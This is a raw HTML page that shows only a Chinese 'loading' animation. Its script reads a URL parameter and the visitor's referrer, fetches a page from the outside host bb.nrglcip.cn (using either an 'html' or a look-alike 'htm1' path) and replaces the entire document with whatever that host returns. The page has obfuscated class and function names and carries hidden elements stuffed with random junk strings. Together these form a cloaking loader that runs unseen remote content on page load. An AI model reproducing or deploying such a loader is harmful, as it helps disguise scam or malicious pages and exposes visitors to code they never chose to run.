<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Ou4Jx41N {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Ou4Jx41N .duhdqgO {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Ou4Jx41N .content {
            line-height: 50px;
            text-align: center
        }

        .Ou4Jx41N .img {
            width: 100%
        }

        .Ou4Jx41N .roXT7crwIrQ {
            text-align: center
        }

        .Ou4Jx41N .roXT7crwIrQ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Ou4Jx41N .roXT7crwIrQ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Ou4Jx41N .roXT7crwIrQ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Ou4Jx41N .roXT7crwIrQ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Ou4Jx41N .roXT7crwIrQ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Ou4Jx41N .roXT7crwIrQ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Ou4Jx41N .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function AZ9mDWH6fN(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var JgsiGYo = AZ9mDWH6fN('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ JgsiGYo +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ JgsiGYo +".html?a=share";
		}
		
        Q4vNWMzzdY=url+"#"+new Date().getTime();
        Q4vNWMzzdY && function() {
            $.get(Q4vNWMzzdY, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>tHnmxzyhn70HVqRhuNAL</p>
<h1 style='display:none' >JxWbCtS8eQ1Rs5x</h1>
<img  src='' style='display:none'>
<p  style='display:none'>tHnmxzyhn70HVqRhuNAL</p>
<div style='display:none'>aQoMmv5Xr9zTyeNsZMY4PG5Bgf5Q9UiNdIS10vIy0jlhH8o9WCq6RX0YZeRhjvYmBLna0jxI</div>
<span style='display:none'>QOIkcwaST9rIgjtY2mHiUXQkZrMidHyzYbjEmK23pIgUVe1KPerdeRw27yT7bJeGkLsFYKrF7VUtGqHcJQ3Anfaf94t7</span>
<span style='display:none'>QOIkcwaST9rIgjtY2mHiUXQkZrMidHyzYbjEmK23pIgUVe1KPerdeRw27yT7bJeGkLsFYKrF7VUtGqHcJQ3Anfaf94t7</span>
<a  href='#' style='display:none'>yExDUJIIFQVIO2JfizAbI0ELEjRZ9MXfLlufGumzskLPHU</a><div class="Ou4Jx41N">
    <div class="duhdqgO">
        <div class="roXT7crwIrQ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<b style='display:none' >UIk4pzGgIXPQtWlfCqBFL5F8VWE9AGelJESUTQYbYlAeZItvocMPmqTsxgtrOAAH8KhjtTtgac6NOQDR1NaCjsgTMo8ZA</b>
<div style='display:none'>tt1W1nLPbV4WADXsZJoNA6d5hsT4Q9sGxKUXgfUU34ZVWSuJcXiPnwQ1RbyHV7xw</div>
<li style='display:none' >F4R4MsCT4rfE80VyfSrd49DB0IyQ7fydw9PKaI</li>
<img  src='' style='display:none'></body>
</html>